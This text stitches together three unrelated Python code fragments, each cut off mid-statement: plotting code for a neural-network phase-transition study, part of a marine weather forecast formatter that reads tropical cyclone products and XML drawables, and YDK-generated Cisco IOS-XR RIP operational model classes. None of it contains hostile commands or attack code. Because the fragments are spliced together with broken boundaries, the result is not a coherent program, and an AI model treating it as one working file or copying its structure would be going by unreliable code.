[T_mod2_U2, Output_mod2_U2, V_mod2] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U2, output_neuron2_U2, velocity_U2, 250 )
params_a2, params_b2, params_c2, params_d2 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U2, output_neuron2_U2, velocity_U2 )
T_c_experiment_x_U2 = newtons_method( quadratic1_U2, quadratic2_U2, T_c_guess_U2 )
T_c_experiment_y_U2 = quadratic2_U2(T_c_experiment_x_U2)[0]
if T_c_U1_known :
print 'T_c (U=%d) = %.2f' % (U1, T_c_U1)
print 'T_c, experiment = %.2f' % T_c_experiment_x_U1
print 'Percent error = %.2g %%' % (abs(1.-T_c_experiment_x_U1/T_c_U1)*100)
else :
print 'T_c, experiment = %.2f' % T_c_experiment_x_U1
print 'T_c (U=%d) = %.2f' % (U2, T_c_U2)
print 'T_c, experiment = %.2f' % T_c_experiment_x_U2
print 'Percent error = %.2g %%' % (abs(1.-T_c_experiment_x_U2/T_c_U2)*100)
plt.close('all')
# Graph properties #############################################################
# Define colours in RGB space
Color = [ [0.90, 0.25, 0.35], [0.95, 0.35, 0.00], [0.95, 0.55, 0.00],
[0.95, 0.75, 0.00], [0.55, 0.90, 0.25], [0.40, 0.95, 0.40],
[0.40, 0.95, 0.45], [0.40, 0.95, 0.50], [0.40, 0.95, 0.55],
[0.20, 0.60, 0.80], [0.20, 0.60, 0.85], [0.20, 0.60, 0.90],
[0.20, 0.60, 0.95], [0.20, 0.40, 0.95], [0.40, 0.20, 0.95],
[0.80, 0.20, 0.95], [0.10, 0.10, 0.10], [0.60, 0.60, 0.60]
]
if plot_progress_output_and_accuracy :
fig = plt.figure( figsize = plt.figaspect( 1.33 ) *3.0 )
ax11 = fig.add_subplot( 3, 1, 1 )
#for i in range(len(epoch_at_which_model_saved)) :
# ax11.plot([epoch_at_which_model_saved[i],
# epoch_at_which_model_saved[i]],[0,1], ls='-.',
# label = '', color=Color[2], lw=2, alpha=0.5)
#ax11.plot([],[],ls='-.',
# label = '$\mathrm{Epoch\ at\ which\ model\ saved}$', color=Color[2], lw=2,
# alpha=0.5)
ax11.plot(training_epochs, training_accuracy, ls='-',
label = '$\mathrm{Training\ accuracy}$', color=Color[1], lw=2, alpha=1.0)
ax11.plot(training_epochs, test_accuracy , ls='-',
label = '$\mathrm{Test\ accuracy}$', color=Color[9], lw=2, alpha=1.0)
ax11.set_xlabel('$\mathrm{Training\ epoch}$', fontsize='25')
ax11.set_ylabel('$\mathrm{Accuracy}$', fontsize='25')
#plt.xlim([0.2,10])
plt.ylim([0,1])
ax12 = ax11.twinx()
ax12.plot(training_epochs, cost, ls = '--',
label = '$\mathrm{Cross-entropy\ cost}$', color=Color[-1], lw=2, alpha=0.5)
ax12.set_ylabel('$\mathrm{Cost}$', fontsize='25')
lines1, labels1 = ax11.get_legend_handles_labels()
lines2, labels2 = ax12.get_legend_handles_labels()
ax12.legend(lines1+lines2, labels1+labels2, loc='center right', fontsize='15')
ax11.grid(True)
#plt.grid(True)
ax21 = fig.add_subplot( 3, 1, 2 )
if use_single_U :
ax21.plot([T_c_U1, T_c_U1], [0,1], ls='--',
label = '$T_{c} (U=%d) = %.2f$' % (U1, T_c_U1), color=Color[-1], lw=2, alpha=0.5)
ax21.plot(temperature_U1, output_neuron2_U1, color=Color[1], marker='o',
linestyle='None', ms=5, markeredgewidth=0.0, alpha=1.0)
ax21.plot(temperature_U1, output_neuron1_U1, color=Color[9], marker='o',
linestyle='None', ms=5, markeredgewidth=0.0, alpha=1.0)
if grid == 'equal' :
if interpolation == 'linear' :
ax21.plot(temperature_U1, output_neuron2_U1, color=Color[1],
linestyle='-', lw=2, alpha=1.0)
ax21.plot(temperature_U1, output_neuron1_U1, color=Color[9],
linestyle='-', lw=2, alpha=1.0)
elif interpolation == 'cubic' :
ax21.plot(T_mod2_U1, Output_mod2_U1,
ls='-', label='', color=Color[1], lw=2, alpha=1.0)
ax21.plot(T_mod1_U1, Output_mod1_U1,
ls='-', label='', color=Color[9], lw=2, alpha=1.0)
ax21.plot(T_c_experiment_x_U1, T_c_experiment_y_U1,
label='$T_{c,\ \mathrm{experiment}} = %.3f$' % T_c_experiment_x_U1, color=Color[-1],
marker='o', linestyle='None', ms=10, markeredgewidth=0.0, alpha=0.5)
ax21.plot([],[],
label='$\mathrm{Percent\ error} = %.2g %%$'%(abs(1.-T_c_experiment_x_U1/T_c_U1)*100),
linestyle='None')
if grid == 'log' :
if interpolation == 'linear' :
ax21.semilogx(temperature_U1, output_neuron2_U1, color=Color[1],
linestyle='-', lw=2, alpha=1.0)
ax21.semilogx(temperature_U1, output_neuron1_U1, color=Color[9],
linestyle='-', lw=2, alpha=1.0)
elif interpolation == 'cubic' :
ax21.semilogx(T_mod2_U1, Output_mod2_U1,
ls='-', label='', color=Color[1], lw=2, alpha=1.0)
ax21.semilogx(T_mod1_U1, Output_mod1_U1,
ls='-', label='', color=Color[9], lw=2, alpha=1.0)
ax21.semilogx(T_c_experiment_x_U1, T_c_experiment_y_U1,
label='$T_{c,\ \mathrm{experiment}} = %.3f$' % T_c_experiment_x_U1, color=Color[-1],
marker='o', linestyle='None', ms=10, markeredgewidth=0.0, alpha=0.5)
ax21.semilogx([],[],
label='$\mathrm{Percent\ error} = %.2g %%$'%(abs(1.-T_c_experiment_x_U1/T_c_U1)*100),
linestyle='None')
else :
if T_c_U1_known :
ax21.plot([T_c_U1, T_c_U1], [0,1], ls='--',
label = '$T_{c} (U=%d) = %.2f$' % (U1,T_c_U1), color=Color[-1], lw=2, alpha=0.5)
ax21.plot(temperature_U1, output_neuron2_U1, color=Color[1], marker='o',
linestyle='None', ms=5, markeredgewidth=0.0, alpha=1.0)
ax21.plot(temperature_U1, output_neuron1_U1, color=Color[9], marker='o',
linestyle='None', ms=5, markeredgewidth=0.0, alpha=1.0)
ax21.plot(temperature_U2, output_neuron2_U2, color=Color[2], marker='o',
linestyle='None', ms=5, markeredgewidth=0.0, | |
+ \
"[xx.xN xx.xW] IS CURRENTLY IN A STATE OF UNREST AND COULD ERUPT WITH " + \
"LITTLE NOTICE. MARINERS TRAVELING IN THE VICINITY OF [VOLCANO NAME] " + \
"ARE URGED TO EXERCISE CAUTION. IF MARINERS ENCOUNTER VOLCANIC ASH OR " + \
"FLOATING VOLCANIC DEBRIS...YOU ARE ENCOURAGED TO REPORT THE OBSERVATION " + \
"TO THE NATIONAL HURRICANE CENTER BY CALLING 305-229-4424.\n"
return ""
def _createTCM_BasedFeatures(self, argDict):
# Create Feature classes from TCM conversion script input
ccc = "MIA"
siteID = "AT"
tcmBody=""
for index in ["1", "2", "3", "4", "5"]:
#for index in [tcm1, tcm2, tcm3]:
pil = ccc + "WRK" + siteID + index
tcmText = subprocess.check_output(["/awips2/fxa/bin/textdb", "-r", pil])
tcmLines = tcmText.split('\n')
tcmTimeStr = tcmLines[0] # "2100 UTC FRI JAN 15 2016"
if not self._tcmTimeOverlaps(tcmTimeStr):
continue
tcmBegin = tcmLines[2]
tcmBody = string.join(tcmLines[2:], "\n")
warningDict = {
"Hurricane": "...Hurricane Warning...",
"Hurricane Force": "...Hurricane Force Wind Warning...",
"Tropical Storm": "...Tropical Storm Warning",
"Storm": "...Storm Warning",
"Gale": "...Gale Warning",
}
phenomenonDict = {
"Tropical Depression": "Tropical Depression",
"Post-Tropical": "Post-Tropical Cyclone",
"Remnants": "Remnants",
}
feature = self.Feature()
feature.featureType = 'TCM_Based'
featureAreaList = []
for key in warningDict:
headline = warningDict.get(key)
if tcmBegin.find(headline) > -1 or tcmBegin.find(headline.upper()) > -1:
feature.highestWarning = key
feature.highestWarningTimePeriod = self._convertToTimeRange("00h")
break
if not feature.highestWarning:
for key in phenomenonDict:
phen = phenomenonDict.get(key)
if tcmBegin.find(phen) > -1 or tcmBegin.find(phen.upper()) > -1:
feature.phenomenonType = key
break
feature.earliestTimePeriod = self._convertToTimeRange("00h")
feature.autoText = tcmBody.strip()
self._features.append(feature)
def _tcmTimeOverlaps(self, tcmTimeStr):
tcmTime = self.convertBaseTime(tcmTimeStr)
curTime = time.time()
### 6 hours is the maximum time difference allowed for the TCM to be considered overlapping
threshold = 6 * 3600
if abs(curTime - tcmTime) < threshold:
return True
return False
def convertBaseTime(self, timeStr):
# extract time parts from the str
hour = int(timeStr[0:2])
minute = int(timeStr[2:4])
strList = timeStr.split(" ")
monthStr = strList[3]
month = self.monthNum(monthStr)
day = int(strList[4])
year = int(strList[5])
# time.mktime returns time in seconds but in local time
baseTime = time.mktime((year, month, day, hour, minute, 0, 0, 0, 0))
# Adjustment to UTC
diffTime = time.mktime(time.gmtime()) - time.mktime(time.localtime())
# subtract the timezone offset and truncate to the start of the hour
roundedTime = int((baseTime - diffTime) / 3600) * 3600
return roundedTime
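# Example (sketch): for the header line "2100 UTC FRI JAN 15 2016" the fields parsed
# above are hour=21, minute=0, month=1, day=15, year=2016, and the returned value is
# the corresponding UTC epoch time truncated to the hour.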
def monthNum(self, monthStr):
monthList = ["JAN", "FEB", "MAR", "APR", "MAY", "JUN",
"JUL", "AUG", "SEP", "OCT", "NOV", "DEC"]
try:
return monthList.index(monthStr) + 1
except ValueError:
return 0
def _readCurrentTCM(self, argDict):
pass
def _createDrawableFeatures(self, argDict):
# Create Features from VGF / XML Drawable files
# Associating any drawables that match an existing Named Feature
print "***In Create Drawables***"
remainingDrawables = []
for drawableElement in self._ingestDrawables():
print "DrawableElement:", drawableElement.printDrawable()
if drawableElement.drawableType not in ['Ridge', 'Ice Edge', 'Gulf Stream']:
if self._associateDrawableElementWithFeature(drawableElement):
continue
remainingDrawables.append(drawableElement)
# For the remaining Drawables, group them based on compatibility types and proximity
groups = []
# group is a list of drawables
# CJ change
group = [remainingDrawables[0]] if remainingDrawables else []
#group = [drawables[0]]
remainingDrawables = remainingDrawables[1:]
i = 0
while remainingDrawables and i < 100:
group, remainingDrawables, done = self._groupDrawables(group, remainingDrawables)
if done:
groups.append(group)
if len(remainingDrawables) > 0:
group = remainingDrawables[0]
remainingDrawables = remainingDrawables[1:]
i = i + 1
print "i=", i
if group:
groups.append(group)
# this line replaced commented out code block above
group = [remainingDrawables]
# Create a Feature from each group
for group in groups:
# Create a Drawable Feature
feature = self.Feature()
feature.featureType = 'Drawable'
featureAreaList = []
# Create all the periods as placeholders
periods = []
for index in ['00','24','48']:
period = self.Period()
period.timePeriod = self._convertToTimeRange(index+'h')
periods.append(period)
### uncommenting the line below causes an infinite loop
#feature.periods = periods
if type(group) is types.ListType:
for drawable in group:
print "feature.periods:", feature.periods
for period in feature.periods:
if drawable.timePeriod == period.timePeriod:
period.drawables.append(drawable)
print "appending to period.drawables in list type"
else:
continue
else:
for period in feature.periods:
if group.timePeriod == period.timePeriod:
period.drawables.append(group)
print "appending to period.drawables in non-list type"
else:
continue
for period in periods:
if period.drawables:
feature.periods.append(period)
feature.periods.sort(self._sortPeriodsByTime)
if len(feature.periods) > 0:
feature.earliestTimePeriod = feature.periods[0].timePeriod
self._features.append(feature)
def _groupDrawables(self, group, drawables):
# Try to add each drawable to the group
done = True
newGroup = []
# for g in group:
# print "group is:", g
# newGroup.append(g)
print "group is:", type(group)
newGroup = self._copyDrawables(group)
returnedDrawables = []
if type(group) is types.ListType:
for d1 in group:
for d2 in drawables:
if self._compatibleDrawableTypes(d1, d2):
if self._proximity(d1, d2):
newGroup.append(d2)
done = False
else:
returnedDrawables.append(d2)
return newGroup, returnedDrawables, done
else:
return group, returnedDrawables, True
def _copyDrawables(self, group):
print "dir:", dir(group)
if type(group) is types.ListType:
newList = []
for g in group:
newList.append(g)
return newList
else: # it's a singleton
drawable = self.Drawable()
drawable.timePeriod = group.timePeriod
drawable.latLons = group.latLons
drawable.pressureTag = group.pressureTag
drawable.movement = group.movement
drawable.drawableType = group.drawableType
return drawable
return
def _ingestDrawables(self):
# Read in the files and use ElementTree to parse them and create Drawables
drawables = []
print 'IngestDrawables'
for t in ['24']:
#for t in ['00','24','48']:
fileName = '/localapps/dev/HSF/'+t+'.xml'
#Below is where cron files live (note they get purged at H+45)
#fileName = '/data/fxa/LOCAL/getvgf/data/'+t+'.xml'
print "fileName", fileName
tree = ET.parse(fileName)
timePeriod = self._convertToTimeRange(t+'h')
# Get the Lines
for line in tree.iter("Line"):
drawable = self.Drawable()
pgenType = line.attrib.get('pgenType')
print "pgenType", pgenType
#pgenExcludeList = ["LINE_SOLID", "LINE_DASHED_6", "FILLED_ARROW", "POINTED_ARROW", "DRY_LINE", "General Text", "Contours", "None"]
pgenExcludeList = ["LINE_SOLID", "LINE_DASHED_6", "FILLED_ARROW", "POINTED_ARROW", "DRY_LINE", "Contours", "None"]
if pgenType in pgenExcludeList:
print "pgenType skipped:", pgenType
continue
drawable.drawableType = self._pgenTypeDecodeDict().get(pgenType)
drawable.timePeriod = timePeriod
drawable.latLons = self._getLatLons(line)
drawable.printDrawable()
drawables.append(drawable)
# Get the collections with Symbols
for collection in tree.iter("DECollection"):
for symbol in collection.iter("Symbol"):
drawable = self.Drawable()
pgenType = symbol.attrib.get('pgenType')
print "pgenType", pgenType
drawable.drawableType = self._pgenTypeDecodeDict().get(pgenType)
drawable.timePeriod = timePeriod
drawable.latLons = self._getLatLons(symbol)
for textline in collection.iter("textline"):
drawable.pressureTag = textline.text + " mb"
print "printing collection drawable"
drawable.printDrawable()
drawables.append(drawable)
return drawables
def _best_way(self, number):
if number%2==0:
return "even"
else:
return "odd"
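# _getLatLons (below) appears to snap each Lat/Lon to the nearest half degree (via
# the +0.25 / truncate-to-int / halve sequence, which truncates toward zero for
# negative values) and then stores whole-degree values as plain ints, so e.g. 25.0
# is kept as 25 while 25.5 stays a float.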
def _getLatLons(self, node):
latLons = []
for point in node.findall("Point"):
lat = round(float(point.attrib.get("Lat")),1)
lat = int((lat + 0.25) * 2.0) / 2.0
lat = float(lat)
latmult = lat * 10
if (self._best_way(latmult)) == "even":
lat = int(lat)
lon = round(float(point.attrib.get("Lon")),1)
lon = int((lon + 0.25) * 2.0) / 2.0
lon = float(lon)
lonmult = lon * 10
if (self._best_way(lonmult)) == "even":
lon = int(lon)
# lat = float(point.attrib.get("Lat"))
# lon = float(point.attrib.get("Lon"))
latLons.append((lat, lon))
return latLons
def _associateDrawableElementWithFeature(self, drawableElement):
# Determine if the drawableElement can be associated with a feature
# If so, determine if is associated
found = False
latLons = drawableElement.latLons
for feature in self._features:
if feature.featureType not in ['Named']:
continue
for period in feature.periods:
if self._drawableElementOverlaps(period.areas, latLons):
period.drawables.append(drawableElement)
print "appending to period.drawables in associate"
found = True
return found
# TO DO -- complete this
def _compatibleDrawableTypes(self, d1, d2):
compatibleTypes = [('High', 'Ridge'), ('Trough', 'Low'), ('Tropical Wave', 'Low'), ('Low', 'Cold Front')]
t1 = d1.drawableType
t2 = d2.drawableType
if t1 == t2:
return True
if (t1, t2) in compatibleTypes or (t2, t1) in compatibleTypes:
return True
else:
return False
def _sampleData(self, argDict):
elements = self._analysisList(argDict)
periods = []
areaTuples = []
for feature in self._features:
if feature.featureType != 'Named':
continue
for period in feature.periods:
periods.append((period.timePeriod, 'timeLabel'))
for area in period.areas:
if area.refData:
editArea = area.refData
else:
editArea = area.areaName
areaTuples.append((editArea, area.areaLabel))
sampleInfo = (elements, periods, areaTuples)
#print "\nSampleInfo", sampleInfo
self._sampler = self.getSampler(argDict, sampleInfo)
print "Sampler", self._sampler
#####
def getSampler(self, argDict, sampleInfo, sampleFromServer=0):
# Get a HistoSampler given
# sampleInfo, which is a list of tuples, or just a single tuple
# of tuples ([elements], [periods], [areas])
# the elements are [(name, method)] -- basically the analysis list
# the periods [(timeRange, label)]
# areas [(name,label)] or | |
this interface
**type**\: bool
**config**\: False
.. attribute:: is_passive_interface
Passive interface indicator
**type**\: bool
**config**\: False
.. attribute:: multicast_address
Use broadcast address for v2 packets
**type**\: bool
**config**\: False
.. attribute:: accept_metric
Accept routes of metric 0 indicator
**type**\: bool
**config**\: False
.. attribute:: send_version
Versions that the interface is sending
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: receive_version
Versions that the interface will receive
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: state
Current state of the interface
**type**\: :py:class:`InterfaceState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.InterfaceState>`
**config**\: False
.. attribute:: destination_address
IP Address of this interface
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length
Prefix length of the IP address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric_cost
Cost added to routes through this interface
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: split_horizon
Split horizon enabled indicator
**type**\: bool
**config**\: False
.. attribute:: poison_horizon
Poisoned reverse enabled indicator
**type**\: bool
**config**\: False
.. attribute:: triggered_rip
Triggered RIP enabled indicator
**type**\: bool
**config**\: False
.. attribute:: neighbor_address
Interface's triggered RIP neighbor
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: oom_flags
Out\-of\-memory status flags
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: join_status
Multicast group join status
**type**\: bool
**config**\: False
.. attribute:: lpts_state
LPTSState
**type**\: bool
**config**\: False
.. attribute:: auth_mode
Authentication Mode
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: auth_keychain
Authentication Keychain Name
**type**\: str
**config**\: False
.. attribute:: send_auth_key_exists
Authentication send key exists
**type**\: bool
**config**\: False
.. attribute:: auth_key_md5
Authentication key programmed with MD5 algorithm
**type**\: bool
**config**\: False
.. attribute:: auth_key_send_id
Current active Send Authentication Key Id
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: total_pkt_recvd
Total packets received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_wrong_kc
Packets dropped due to wrong keychain configured
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_no_auth
Packets dropped due to missing authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_invalid_auth
Packets dropped due to invalid authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_accepted_valid_auth
Packets accepted with valid authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rip_summary
User defined summary addresses
**type**\: list of :py:class:`RipSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.Vrfs.Vrf.Interfaces.Interface.RipSummary>`
**config**\: False
.. attribute:: rip_peer
Neighbors on this interface
**type**\: list of :py:class:`RipPeer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.Vrfs.Vrf.Interfaces.Interface.RipPeer>`
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.Vrfs.Vrf.Interfaces.Interface, self).__init__()
self.yang_name = "interface"
self.yang_parent_name = "interfaces"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_name']
self._child_classes = OrderedDict([("rip-summary", ("rip_summary", Rip.Vrfs.Vrf.Interfaces.Interface.RipSummary)), ("rip-peer", ("rip_peer", Rip.Vrfs.Vrf.Interfaces.Interface.RipPeer))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('if_handle', (YLeaf(YType.str, 'if-handle'), ['str'])),
('rip_enabled', (YLeaf(YType.boolean, 'rip-enabled'), ['bool'])),
('is_passive_interface', (YLeaf(YType.boolean, 'is-passive-interface'), ['bool'])),
('multicast_address', (YLeaf(YType.boolean, 'multicast-address'), ['bool'])),
('accept_metric', (YLeaf(YType.boolean, 'accept-metric'), ['bool'])),
('send_version', (YLeaf(YType.uint32, 'send-version'), ['int'])),
('receive_version', (YLeaf(YType.uint32, 'receive-version'), ['int'])),
('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper', 'InterfaceState', '')])),
('destination_address', (YLeaf(YType.str, 'destination-address'), ['str'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('metric_cost', (YLeaf(YType.uint32, 'metric-cost'), ['int'])),
('split_horizon', (YLeaf(YType.boolean, 'split-horizon'), ['bool'])),
('poison_horizon', (YLeaf(YType.boolean, 'poison-horizon'), ['bool'])),
('triggered_rip', (YLeaf(YType.boolean, 'triggered-rip'), ['bool'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str'])),
('oom_flags', (YLeaf(YType.uint32, 'oom-flags'), ['int'])),
('join_status', (YLeaf(YType.boolean, 'join-status'), ['bool'])),
('lpts_state', (YLeaf(YType.boolean, 'lpts-state'), ['bool'])),
('auth_mode', (YLeaf(YType.uint32, 'auth-mode'), ['int'])),
('auth_keychain', (YLeaf(YType.str, 'auth-keychain'), ['str'])),
('send_auth_key_exists', (YLeaf(YType.boolean, 'send-auth-key-exists'), ['bool'])),
('auth_key_md5', (YLeaf(YType.boolean, 'auth-key-md5'), ['bool'])),
('auth_key_send_id', (YLeaf(YType.uint64, 'auth-key-send-id'), ['int'])),
('total_pkt_recvd', (YLeaf(YType.uint32, 'total-pkt-recvd'), ['int'])),
('pkt_drop_wrong_kc', (YLeaf(YType.uint32, 'pkt-drop-wrong-kc'), ['int'])),
('pkt_drop_no_auth', (YLeaf(YType.uint32, 'pkt-drop-no-auth'), ['int'])),
('pkt_drop_invalid_auth', (YLeaf(YType.uint32, 'pkt-drop-invalid-auth'), ['int'])),
('pkt_accepted_valid_auth', (YLeaf(YType.uint32, 'pkt-accepted-valid-auth'), ['int'])),
])
self.interface_name = None
self.interface = None
self.if_handle = None
self.rip_enabled = None
self.is_passive_interface = None
self.multicast_address = None
self.accept_metric = None
self.send_version = None
self.receive_version = None
self.state = None
self.destination_address = None
self.prefix_length = None
self.metric_cost = None
self.split_horizon = None
self.poison_horizon = None
self.triggered_rip = None
self.neighbor_address = None
self.oom_flags = None
self.join_status = None
self.lpts_state = None
self.auth_mode = None
self.auth_keychain = None
self.send_auth_key_exists = None
self.auth_key_md5 = None
self.auth_key_send_id = None
self.total_pkt_recvd = None
self.pkt_drop_wrong_kc = None
self.pkt_drop_no_auth = None
self.pkt_drop_invalid_auth = None
self.pkt_accepted_valid_auth = None
self.rip_summary = YList(self)
self.rip_peer = YList(self)
self._segment_path = lambda: "interface" + "[interface-name='" + str(self.interface_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rip.Vrfs.Vrf.Interfaces.Interface, ['interface_name', 'interface', 'if_handle', 'rip_enabled', 'is_passive_interface', 'multicast_address', 'accept_metric', 'send_version', 'receive_version', 'state', 'destination_address', 'prefix_length', 'metric_cost', 'split_horizon', 'poison_horizon', 'triggered_rip', 'neighbor_address', 'oom_flags', 'join_status', 'lpts_state', 'auth_mode', 'auth_keychain', 'send_auth_key_exists', 'auth_key_md5', 'auth_key_send_id', 'total_pkt_recvd', 'pkt_drop_wrong_kc', 'pkt_drop_no_auth', 'pkt_drop_invalid_auth', 'pkt_accepted_valid_auth'], name, value)
class RipSummary(_Entity_):
"""
User defined summary addresses
.. attribute:: prefix
Summary address prefix
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length
Summary address prefix length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: next_hop_address
Summary address next hop
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: metric
Summary metric
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.Vrfs.Vrf.Interfaces.Interface.RipSummary, self).__init__()
self.yang_name = "rip-summary"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('next_hop_address', (YLeaf(YType.str, 'next-hop-address'), ['str'])),
('metric', (YLeaf(YType.int32, 'metric'), ['int'])),
])
self.prefix = None
self.prefix_length = None
self.next_hop_address = None
self.metric = None
self._segment_path = lambda: "rip-summary"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rip.Vrfs.Vrf.Interfaces.Interface.RipSummary, ['prefix', 'prefix_length', 'next_hop_address', 'metric'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.Vrfs.Vrf.Interfaces.Interface.RipSummary']['meta_info']
class RipPeer(_Entity_):
"""
Neighbors on this interface
.. attribute:: peer_uptime
Uptime of this peer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: peer_address
IP Address of this peer
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: peer_version
RIP version for this peer
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: discarded_peer_packets
Discarded packets from this peer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: discarded_peer_routes
Discarded routes from this peer
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.Vrfs.Vrf.Interfaces.Interface.RipPeer, self).__init__()
self.yang_name = "rip-peer"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('peer_uptime', (YLeaf(YType.uint32, 'peer-uptime'), ['int'])),
('peer_address', (YLeaf(YType.str, 'peer-address'), ['str'])),
('peer_version', (YLeaf(YType.uint8, 'peer-version'), ['int'])),
('discarded_peer_packets', (YLeaf(YType.uint32, 'discarded-peer-packets'), ['int'])),
('discarded_peer_routes', (YLeaf(YType.uint32, 'discarded-peer-routes'), ['int'])),
])
self.peer_uptime = None
self.peer_address = None
self.peer_version = None
self.discarded_peer_packets = None
self.discarded_peer_routes = None
self._segment_path = lambda: "rip-peer"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rip.Vrfs.Vrf.Interfaces.Interface.RipPeer, ['peer_uptime', 'peer_address', 'peer_version', 'discarded_peer_packets', 'discarded_peer_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.Vrfs.Vrf.Interfaces.Interface.RipPeer']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.Vrfs.Vrf.Interfaces.Interface']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.Vrfs.Vrf.Interfaces']['meta_info']
class Global(_Entity_):
"""
Global Information
.. attribute:: vrf_summary
VRF summary data
**type**\: :py:class:`VrfSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.Vrfs.Vrf.Global.VrfSummary>`
**config**\: False
.. attribute:: interface_summary
List of Interfaces configured
**type**\: list of :py:class:`InterfaceSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.Vrfs.Vrf.Global.InterfaceSummary>`
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.Vrfs.Vrf.Global, self).__init__()
self.yang_name = "global"
self.yang_parent_name = "vrf"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("vrf-summary", ("vrf_summary", Rip.Vrfs.Vrf.Global.VrfSummary)), ("interface-summary", ("interface_summary", Rip.Vrfs.Vrf.Global.InterfaceSummary))])
self._leafs = OrderedDict()
self.vrf_summary = Rip.Vrfs.Vrf.Global.VrfSummary()
self.vrf_summary.parent = self
self._children_name_map["vrf_summary"] = "vrf-summary"
self.interface_summary = YList(self)
self._segment_path = lambda: "global"
self._is_frozen = | |
###
###
###
